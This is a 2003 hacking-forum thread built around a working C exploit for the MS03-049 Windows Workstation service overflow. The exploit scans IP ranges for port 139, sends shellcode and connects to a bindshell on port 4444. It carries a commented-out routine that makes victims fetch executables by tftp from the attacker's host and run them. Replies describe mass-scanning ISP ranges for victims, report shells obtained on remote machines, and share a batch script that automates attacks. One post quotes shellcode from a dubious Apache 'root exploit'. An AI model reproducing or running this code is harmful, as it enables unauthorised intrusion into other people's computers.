Ms03-049 Recode

slynx

Dec 14 2003, 07:35 PM

Okay, this is simply my personal recode for the wkksvc.dll overflow exploit. Given a range of IP or a single target it will do the following:

[1] Ping host
[2] Scan port 139 if ping OK
[3] If port 139 open, attack
[4] If exploit success, drop to shell

QUOTE

[+] ms03-049 wkksvc.dll buffer overflow - exploit recode
[+] Starting ping scan from 10.15.8.24 to 10.15.8.24 ...
[+] 10.15.8.24 appears to be up ... scanning port 139 ...
[+] Found port 139 open for connections on 10.15.8.24 ...
[+] Connection socket will sleep for four seconds ...
[+] Attacking remote host 10.15.8.24 ...

Local name
Remote name \\10.15.8.24\ipc$
Resource type IPC
Status Disconnected
# Opens 0
# Connections 18
The command completed successfully.

[+] GetProcAddr: 71c5679e
[+] Sending exploit to 10.15.8.24 ...
[+] Connection socket initialized ...
[+] Trying to connect to 10.15.8.24:4444 ...
[+] Connected to bindshell on 10.15.8.24:4444 ...
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\WINNT\system32>exit
[+] Closing socket and cleaning up ...
[+] Scanning completed ... closing program ...

QUOTE

#include <windows.h>
#include <winbase.h>
#include <lm.h>
#include "LMJoin.h"
#include <winnls.h>
#include <stdio.h>
#include <string.h>
#include "CPing.h"
#include <stdlib.h>
#include <process.h>
#include <io.h>
#include <iostream>
#include <ctime>
#include <cstdlib>

using namespace std;

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "mpr")

long gimmeip(char *hostname);
void scanip(char *startip, char *endip);
void gotoshell(void);
void doshell(int sock);

SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;

char *targetiptmp;

typedef VOID (*MYPROC)(IN LPCWSTR Server OPTIONAL,
IN LPCWSTR AlternateName,
IN LPCWSTR DomainAccount OPTIONAL,
IN LPCWSTR DomainAccountPassword OPTIONAL,
IN ULONG Reserved
);
int main(int argc, char **argv) {

if (argc < 2) {
fprintf(stderr, "\n[+] ms03-049 wkksvc.dll buffer overflow <exploit only>\n");
fprintf(stderr, "[+] this is private copy ... and requires a large towel :)\n");
fprintf(stderr, "[+] usage = %s <start ip> [end ip]\n", argv[0]);
exit(1);
}

printf("\n[+] ms03-049 wkksvc.dll buffer overflow - exploit recode\n");

if (argc < 3) {
scanip(argv[1],argv[1]);
}else{
scanip(argv[1],argv[2]);
}

printf("[+] Scanning completed ... closing program ... \n");
exit(0);
return(0);
}
//*/
DWORD WINAPI SploitThread( LPVOID lpParam )
{
char overwrite[2045] = "";
char sc[] = "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

char exp_buf[2045+4+16+501];
char ip[30];
char netuse[100];
char *targetip = targetiptmp;
LPWSTR ipl[60];
DWORD jmpesp = 0x7518A747;
char unicode[(2045+4+16+501)*2];
int i = 0;
int x = 0;
int len = 0;
HINSTANCE hinstLib;
MYPROC ProcAddr;
BOOL fFreeResult, fRunTimeLinkSuccess = FALSE;

printf("[+] Attacking remote host %s ...\n",targetip);

sprintf(netuse,"net use \\\\%s\\ipc$ "" /u:""",targetip);

printf("\n",netuse);

system(netuse);

_snprintf(ip, 24, "\\\\%s", targetip);
hinstLib = LoadLibrary("netapi32.dll");

memset(overwrite, 0x41, 2000);
memset(overwrite+2000, 0x90, 44);
memcpy(exp_buf, overwrite, 2044);
memcpy(exp_buf+2044, &jmpesp, 4);
memset(exp_buf+2048, 0x90, 16);
memcpy(exp_buf+2064, sc, sizeof(sc));
memset(unicode, 0x00, sizeof(unicode));
for (x = 0, i = 0; i <= sizeof(unicode); x++, i+=2) {
unicode[i] = exp_buf[x];
}
MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60);

if (hinstLib != NULL) {
ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName");
if (NULL != ProcAddr) {
fRunTimeLinkSuccess = TRUE;

printf("[+] GetProcAddr: %x\n", *ProcAddr);
printf("[+] Sending exploit to %s ...\n", targetip);

(ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0);

} else {

printf("\n[x] The value of procaddr is null !\n");

}
fFreeResult = FreeLibrary(hinstLib);
} else {

printf("[x] The value of hinst is null !\n");

}
ExitThread(0);
return 1;
}
long gimmeip(char *hostname)
{
struct hostent *he;
long ipaddr;

if ((ipaddr = inet_addr(hostname)) < 0)
{
if ((he = gethostbyname(hostname)) == NULL)
{
printf("[x] Failed to resolve host: %s ... \n\n",hostname);

WSACleanup();
return NULL;
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
void scanip(char *startip, char *endip)
{
unsigned long start;
unsigned long end;
unsigned long counter;
DWORD dwThreadId, dwThrdParam = 1;
CPing ping;
WSADATA wsaData;
WSAStartup(MAKEWORD(1, 1), &wsaData);
SOCKET sock;
SOCKADDR_IN host;
char *curtarget;
int ports = 139;

start=inet_addr(startip);
end=inet_addr(endip);

printf("[+] Starting ping scan from %s to %s ...\n",startip,endip);

for (counter = ntohl(start); counter <= ntohl(end); counter++)
{

host.sin_family = AF_INET;
host.sin_port = htons(ports);
host.sin_addr.s_addr = htonl(counter);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
curtarget = inet_ntoa(host.sin_addr);

BOOL bResult = ping.Ping(curtarget);

if( bResult )
{
printf("[+] %s appears to be up ... scanning port 139 ...\n",curtarget);

if((connect(sock, (SOCKADDR *)&host, sizeof(host))) == -1)
{
printf("[x] Port 139 is closed or filtered on %s ...\n", curtarget);

closesocket(sock);
}else{

printf("[+] Found port 139 open for connections on %s ...\n", curtarget);

closesocket(sock);

targetiptmp = curtarget;
CreateThread(NULL,0,SploitThread,&dwThrdParam,0,&dwThreadId);
gotoshell();
}
}else{

printf("[x] %s does not appear to be up ...\n",curtarget);

}
}
return;
}
void gotoshell(void)
{
WSADATA wsdata;
int sock;
char *targetip = targetiptmp;
unsigned short port = 4444;
struct sockaddr_in target;
unsigned long daip;

printf("[+] Connection socket will sleep for four seconds ... \n");

Sleep(4000);

if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {

printf("[x] Startup error in the connection socket ... \n");

WSACleanup();
return;
}

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {

printf("[x] Connection socket not initialized ...\n");

WSACleanup();
return;
}

printf("[+] Connection socket initialized ...\n");

daip=gimmeip(targetip);
memset(&target, 0, sizeof(target));
target.sin_family=AF_INET;
target.sin_addr.s_addr = daip;
target.sin_port=htons(port);

printf("[+] Trying to connect to %s:%d ...\n",targetip,port);

if(connect(sock,(struct sockaddr *)&target, sizeof(target))!=0) {

printf("[x] Connect to bindshell on %s:%d failed ...\n", targetip, port);

WSACleanup();
return;
}else{

printf("[+] Connected to bindshell on %s:%d ...\n", targetip, port);

doshell(sock);

//doautohack(sock);

printf("[+] Closing socket and cleaning up ...\n");

closesocket(sock);
WSACleanup();
}
return;
}
/*
void doautohack(int sock)
{
char cmd1[150];
char cmd2[150];
char cmd3[150];
char cmd4[150];
char cmd5[150];
char tmp[512];
char locn[255];
char *locip;
gethostname(locn, 255);
locip = inet_ntoa(*(struct in_addr *)*gethostbyname(locn)->h_addr_list);
Sleep(5000);
sprintf(cmd1, "tftp -i %s get file1.exe", locip);
sprintf(cmd2, "\r\ntftp -i %s get file2.exe", locip);
sprintf(cmd3, "\r\ntftp -i %s get file3.exe", locip);
sprintf(cmd5, "\r\ntftp -i %s get file4.bat", locip);
sprintf(cmd4, "\r\nfile4.bat.bat");
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd1);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd2);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd3);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd5);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd4);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
send(sock,"\n",sizeof("\n"),0);
Sleep(500);
return;
}
//*/
//*
void doshell(int sock) {
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];

time.tv_sec=1;
time.tv_usec=0;

while (1) {
ul[0]=1;
ul[1]=sock;

l=select(0,(fd_set *)&ul,NULL,NULL,&time);
if(l==1) {
l=recv(sock,buf,sizeof(buf),0);
if (l<=0) {
return;
}
l=write(1,buf,l);
if (l<=0) {
return;
}
}
else {
l=read(0,buf,sizeof(buf));
if (l<=0) {
return;
}
l=send(sock,buf,l,0);
if (strncmp(buf,"exit",strlen("exit")) ==0)
{
return;
}
if (l<=0) {
return;
}
}
}
}
//*/

Attached is a zip with the full source + headers and a standalone binary w/o autohack enabled.

It's not much and there arn't any comments... just some1 else's sploit w/ some addins from others and myself.

~ slynx
[slynx(at)hackit.us]# hackit.us

net

Dec 14 2003, 07:54 PM

norton found "Bloodhound.Exploit" on this one......

is this a virus now or does it only mean the exploit which would be harmless to me.. ?

slynx

Dec 14 2003, 07:58 PM

the attached zip only contains the same source as posted w/ header files and the very same compiled .exe

i have no idea why norton would detect bloodhound in this....but it prob. has something to do with the shell code in the sploit

net

Dec 14 2003, 08:06 PM

bloodhound seems to be some new, guessed virus definition of norton... so it would probably guess a virus in it because of the exploit code......

ducky

Dec 14 2003, 08:42 PM

I'm gonna check it out...Good work m8 thanks for sharing this

UnDeRTaKeR

Dec 14 2003, 08:53 PM

Great JoB M8, going to have a look!

Nick

Dec 14 2003, 09:50 PM

i look it just right now

thxs

jjoao

Dec 14 2003, 10:02 PM

Well, it's a nice share eitherway. Thanks on the effort. Apreciated. Even though it's always better to scan b4

WeeDMoNKeY

Dec 14 2003, 10:17 PM

well made, junk liek this make sme want to learn cpp
i doubt its a virus due to this

http://www.symantec.com/avcenter/venc/data....exploit.4.html

any possible way we can use this from a list of alreayd scanned p: 139 puters?

another edit: to bad everyone patched to sp1 :< we need a sploit for sp1

haxor2k3

Dec 14 2003, 10:18 PM

This shit really rocks

)

slynx

Dec 14 2003, 11:12 PM

i forgot who mentioned it, but port 139 is blocked is blocked by most ISP so this sploit will work on ur network just fine but i have not been able to test any remote machines as of yet.

on my network however i have tested this sploit on winxp sp0 and sp1 and it works just fine. i have yet to test win2k....

WeeDMoNKeY

Dec 14 2003, 11:20 PM

i doubt this works for sp1... cause im scnnaing a range w/ sp1 machines (and ive got it with the old 0349 one) with sp0. So unless someone found a way to h4x sp1 ones

slynx

Dec 14 2003, 11:22 PM

it works....the box i sploited for the console output is sp1 >; )
admittedly it does not work on all sp1 though....but then again no sploit it perfect....

WeeDMoNKeY

Dec 14 2003, 11:25 PM

ah, well then, i dunno im kind of doubtful, ill do some tests and wells ee what happens :>

i used my old method and founda machine that was vuln w.sp0 tried ur prog, and it was a fail.

first thing i notice also is the fact that it does the things in the wrong order
it shodul be exploit net use then nc

but it does liek net use exp then nc

it doesnt work.. which makes me wonder....

/me packet sniffs.

pita

Dec 15 2003, 01:18 AM

nice code

i will look this.

Thanks to you.

Just to say in the russian exploit for win xp we could see that they r using the
mbstowcs() function on the unicode long string so maybe add this function on this code too to make it work with xp sp1 (i didn't test this but its from the code)

slynx

Dec 15 2003, 01:29 AM

keep this in mind: after one good exploitation of a machine, you cannot exploit that same machine again untill after it does a reboot. this is because this sploit crashes the service, and the bindshell is never 100% closed. so what happens is this:

exploit goes fine, connect to bindshell
decide that your done for now and close your connection

try to exploit that same machine again
the sploit says it is sending the overflow + shellcode, then tries to connect to the bindshell.....
the sploit really failed as the workstation service is hung up already from the last sploit, but the old bindshell from the successful sploit is still there (kinda...)
so you connect to the old bindshell, although it is no longer a bindshell...after you close the connection the instance of cmd that was bound to that port also closes, but the port doesn't.....

so you end up with a connection you can send things to but get nothing back....

this is the same kind of thing with the MS03-026 sploit....it really only works once then you essentially lock yourself out of that machine after you close the original bindshell....but when the system restarts....so does the workstation service and everything else, and port 4444 is no longer bound to something that's gone....

sorry about my explanation....i tried.....

anyway in my tests i used 2 differant boxes that i continually restarted after each sploit attempt....

i just pass this on as i have no problem sploiting sp1 with the same sploit posted here.....

hehe....sploit sounds funny when reduntant

WeeDMoNKeY

Dec 15 2003, 01:38 AM

aye, i foudn that out awhile ago after i closed hte shell and lost a machine, well, ive scanned 2 cable ranges with ur exploit, and it doesnt work worth jack, and i scanned 2 different cable ones, and got 10 (via my own bats etc). so eitehr the fact that unless there was no computer, which i highly doubt, or it doesnt work. And im still concerned about the order it goes in. itshouldnt go
net use exploit connect
should be
exploit net use sploit
?

flame

Dec 15 2003, 02:49 AM

Slynx - your the man
------------------------
nice to see some young talents among our community
keep up the good work and just shout if ya need anything.

p.s whats that representing ?
System error 53 has occurred.

The network path was not found.

WeeDMoNKeY

Dec 15 2003, 03:36 AM

roofle... ipc the network path net use \\ip.ip.ip.ip\IPC$ "" /u:"" logs you in with a blank pass and user name.

anyone actually get a machine?

BESIDES slynx ?

im not hating on you slynx jsut wondering why i cant get ANY after 3 or 4 thousand ip's.

Axl

Dec 15 2003, 08:50 AM

nice code indeed..

but it looks as if it works only with xp sp0 and not anything else(2k)

am i right ?

assom

Dec 15 2003, 11:17 AM

I tested on windows XP sp1 , Windows 2000 SP3 , null session is ok, but no shell no problem for the other side.

DJVASTVASTY2K

Dec 15 2003, 12:39 PM

QUOTE (WeeDMoNKeY @ Dec 14 2003, 10:17 PM)

well made, junk liek this make sme want to learn cpp
i doubt its a virus due to this

http://www.symantec.com/avcenter/venc/data....exploit.4.html

any possible way we can use this from a list of alreayd scanned p: 139 puters?

another edit: to bad everyone patched to sp1 :< we need a sploit for sp1

Hello M8's

Thanks For This New Ploit "Slynx"

Works Locally

Just Gotta Try Remotely Yet, I Will post my finding on this after I have tested on some several machines.

@WeeDMoNKeY

Well Spotted on The Symantec

It's good to see that some people actually do a bit of research about the sploit and not just say [THANKS] and Spam It the Board with a single word phrase.

When someone mentioned VIRI you did a bit of research and found out all about it and that it was not a VIRI but infact used some part of the code and thats what Nortons picked up.

Well Done

But Thank You Slynx for this new Ploit

Best Regards

Adam

Vast Gsm

neb

Dec 15 2003, 03:40 PM

Oh yeah this is a real good code

Uli

Dec 15 2003, 03:55 PM

will test it thanks

DaMan

Dec 15 2003, 06:24 PM

very usefull thanks

teest

Dec 15 2003, 10:03 PM

thanks, I just testing

T-BoNe

Dec 15 2003, 10:29 PM

would love to see any proof that its working from someone

but hell of a job dude !

slynx

Dec 15 2003, 10:42 PM

WeeDMoNKeY; its always good to have a critic...where would the fun be if i didn't? in anycase i would greatly appreciate any ideas or modifications on your part, besides, we're supposed to work together....no more fighting >; )

i really don't know why you are unable to get a shell on any sp1 boxes...again i would just like to say tho that i am only testing this on a local network (10.15.x.x) and i have not tried anything other than that...

if anyone has any suggestions on how this can be improved PLEASE SUBMIT!

thanks every1 =)

WeeDMoNKeY

Dec 15 2003, 11:44 PM

aight, no more fighting ;D i was just PRODDING ;D I have now tested it on sp1 (for sure machine) a friend who goes to school with me. Uhm, i think if you got the exploit from here (the code only allows sp0 to work) then we wont get sp1. Also, i still havent got any and ive scanned over 5000 pcs now (left it over night and all day) and have yet to have one, while with the other one, i start it, jerk off to some porn ;> :> and come back and i have a machine. So idunno? (well made thoguh i ahve to admit, good code (im learning c++ as we speak, via school)).

A suggestion would be to allow the exploit to recieve ips from a list. (ones with 139 already scanned) cause scan1000 works 100000 times better than this scanner. And set the order of the exploit being sent so it doesnt scare me

. other than that, need anything feel free to pm me slynx.

flame

Dec 16 2003, 12:06 AM

QUOTE (T-BoNe @ Dec 15 2003, 10:29 PM)

would love to see any proof that its working from someone

but hell of a job dude !

take my word
it works .
im planning some slight modifications now.
thanks again slynx (call me)

wlingard

Dec 16 2003, 12:10 AM

OK...

Slynx.. great code man... really nice.. so a BIG thanks for that!

Here's my findings...

Works internally on my network here every time against Sp1..but remotely
it hardly works.. not sure why but that's the case. I have had 2 remote shells (on
Sp1, both) but they were after some serious number crunching, if ya know what I
mean!

And since then it hasn't worked again so maybe I was just lucky!

Anyways I'm yet to see a decent remotely working version of this exploit.. yet
it seems it can work remotely on occasion so I'm not sure where it's going wrong.
Are the offsets u are using universal or EN only? My knowledge of coding C++ is
also very shite at best... I'm great with web code but little else atm!

As for the suggestions put forward by WeeDMoNKeY (great name man).. I gotta
agree.. taking input from a text file would be good.. I just knocked up a .bat
to deal with that but would be nice if the exploit worked on more machines.

Anyways thanks for sharing ya code man.. not often seen so it's well appreciated!!

//WL

WeeDMoNKeY

Dec 16 2003, 12:16 AM

QUOTE (wlingard @ Dec 16 2003, 12:10 AM)

OK...

Slynx.. great code man... really nice.. so a BIG thanks for that!

Here's my findings...

Works internally on my network here every time against Sp1..but remotely
it hardly works.. not sure why but that's the case. I have had 2 remote shells (on
Sp1, both) but they were after some serious number crunching, if ya know what I
mean!

And since then it hasn't worked again so maybe I was just lucky!

Anyways I'm yet to see a decent remotely working version of this exploit.. yet
it seems it can work remotely on occasion so I'm not sure where it's going wrong.
Are the offsets u are using universal or EN only? My knowledge of coding C++ is
also very shite at best... I'm great with web code but little else atm!

As for the suggestions put forward by WeeDMoNKeY (great name man).. I gotta
agree.. taking input from a text file would be good.. I just knocked up a .bat
to deal with that but would be nice if the exploit worked on more machines.

Anyways thanks for sharing ya code man.. not often seen so it's well appreciated!!

//WL

hmm, maybe youve been talkign it works sp1 LOCALLY, because ive never tried it locally. Ive been speaking remotley, but i figured that you had meant remote... NEVER works on sp1 for me, or even sp0 :< i jsut use the odl one and run a few bats,sucks balls, ill keep scanning with this all night and morn, and ill see if i can nab one (maybe by random chance ive got 0)

WeeDMoNKeY

Dec 16 2003, 12:20 AM

OKAY FOLKS THIS WORKS!!!!!!!!!!!111 /me bows down. It works quite well, id unno why iw as never able to get any machines, mustve been bad luck. (ive got one so ill keep going)

/me shuts mouth :>

works soooooo slow though, ill stick to my old method for now, unless someone *cough* wants uplaod a bat so i can take it out ofa file (im to lazy to make :< )

pipes

Dec 16 2003, 01:48 AM

yerp yep yep yep...

Hackit.us? You awake still?

http://www.hackit.us/main/exploits/apache1327.c

/* :: PRIVATE - DO NOT DISTRIBUTE ::
* Apache/1.3.27 - Remote Root Exploit
* Knights of the Eastern Calculus (info_at_koec.org)
*/

with shellcode....

static char shellcode[] = {
"\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21"
"\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68"
"\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d"
"\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00"
"\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02"
"\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d"
"\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67"
"\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00"
"\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"
"\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50"
"\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1"
"\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24"
"\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44"
"\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89"
"\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0"
};

Hmmm.... triggered a memory and made me grep my inbox ;]

http://seclists.org/lists/fulldisclosure/2003/Jun/0727.html

Might want to take a read....

slynx

Dec 16 2003, 03:02 AM

i must admit i have not updated my server in a VERY long time.....
if anyone wants free space, email, etc. tho your welcome to it, just email me....

and yes, my program works VERY slow as it is not multithreaded in the scanning function....admittedly i don't kno exactley how to pull that one off.....

just use the x-scan plugin and run on a single machine....in case u have not noticed u need only prove a single ip for my recode... then u dont have to scan so many with it.....

DJVASTVASTY2K

Dec 16 2003, 03:35 AM

QUOTE (pipes @ Dec 16 2003, 01:48 AM)

yerp yep yep yep...

Hackit.us? You awake still?

http://www.hackit.us/main/exploits/apache1327.c

/* :: PRIVATE - DO NOT DISTRIBUTE ::
* Apache/1.3.27 - Remote Root Exploit
* Knights of the Eastern Calculus (info_at_koec.org)
*/

with shellcode....

static char shellcode[] = {
"\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21"
"\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68"
"\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d"
"\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00"
"\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02"
"\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d"
"\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67"
"\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00"
"\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"
"\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50"
"\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1"
"\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24"
"\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44"
"\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89"
"\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0"
};

Hmmm.... triggered a memory and made me grep my inbox ;]

http://seclists.org/lists/fulldisclosure/2003/Jun/0727.html

Might want to take a read....

What Has This Apache Exploit got to do with [Ms03-049] ???

Best Regards

Adam

Vast Gsm

WeeDMoNKeY

Dec 16 2003, 03:55 AM

it doesnt, it has to do with hackit.us...

flame

Dec 19 2003, 12:24 PM

here ya go weedmonkey

CODE

@echo off
del scan.txt
scan100 -p 139 %1 %2
notepad scan.txt
rem the notepad is for editing the txt file and clean the 1st and last line manually then save,quit, and press a key. :)
pause
for /f "tokens=1 delims=" %%a, in (scan.txt) do ms03049.exe %%a
echo.
echo. Any Luck ?

Bloodman

Dec 19 2003, 05:34 PM

THX
4
THIS
VERY
COOL
CHILLING
TOOL

Certox

Dec 19 2003, 07:38 PM

Thank You

T-BoNe

Dec 19 2003, 09:05 PM

QUOTE (flame @ Dec 19 2003, 12:24 PM)

here ya go weedmonkey

CODE

@echo off
del scan.txt
scan100 -p 139 %1 %2
notepad scan.txt
rem the notepad is for editing the txt file and clean the 1st and last line manually then save,quit, and press a key. :)
pause
for /f "tokens=1 delims=" %%a, in (scan.txt) do ms03049.exe %%a
echo.
echo. Any Luck ?

don't you just love batch files

Thonyx

Dec 19 2003, 09:54 PM

Thx for this package!

I'll test it now!

robsonbr

Dec 19 2003, 10:01 PM

ohh (filtered) nice tool m8, lets me test it

cheers

passi

Dec 19 2003, 10:31 PM

isn't there a better way to scan?

Carlos

Dec 20 2003, 02:32 AM

thnx for taking the time to edit/add features to this exploit for us.

WeeDMoNKeY

Dec 20 2003, 05:45 PM

fuckin nice flame.. flame = the man.

Freaky

Dec 20 2003, 06:22 PM

Yeah nice

.
Nice Job etc.

Let'S have some phun

wh173r

Dec 20 2003, 06:30 PM

Alright, im wondering... how do i know if a machine is exploitable. Ive scanned some with IPCscan that seem to be workstation (altho probably 2000), but cant exploit. Right now im doing it with the exploit and was wondering if netcat should be in the dir with the file (it is now, just wondering). Or, dose the exploit telnet.

[+] xxx.xxx.xxx.xxx appears to be up ... scanning port 139 ...
[+] Found port 139 open for connections on xxx.xxx.xxx.xxx ...
[+] Connection socket will sleep for four seconds ...
[+] Attacking remote host 165.123.170.106 ...

System error 53 has occurred.

The network path was not found.

[+] GetProcAddr: 71c59530
[+] Sending exploit to 165.123.170.106 ...
[+] Connection socket initialized ...
[+] Trying to connect to xxx.xxx.xxx.xxx:4444 ...
[x] Connect to bindshell on xxx.xxx.xxx.xxx:4444 failed ...

are the erros i seem to get for every ip. what do these mean !

HiBob

Dec 20 2003, 09:24 PM

thanks, looks great

flame

Dec 21 2003, 01:21 AM

QUOTE (wh173r @ Dec 20 2003, 06:30 PM)

Alright, im wondering... how do i know if a machine is exploitable. Ive scanned some with IPCscan that seem to be workstation (altho probably 2000), but cant exploit. Right now im doing it with the exploit and was wondering if netcat should be in the dir with the file (it is now, just wondering). Or, dose the exploit telnet.
are the erros i seem to get for every ip. what do these mean !

if you get a shell - then its exploitable
if shell=0 then goto quit
:quit
@echo try some more ip's wanker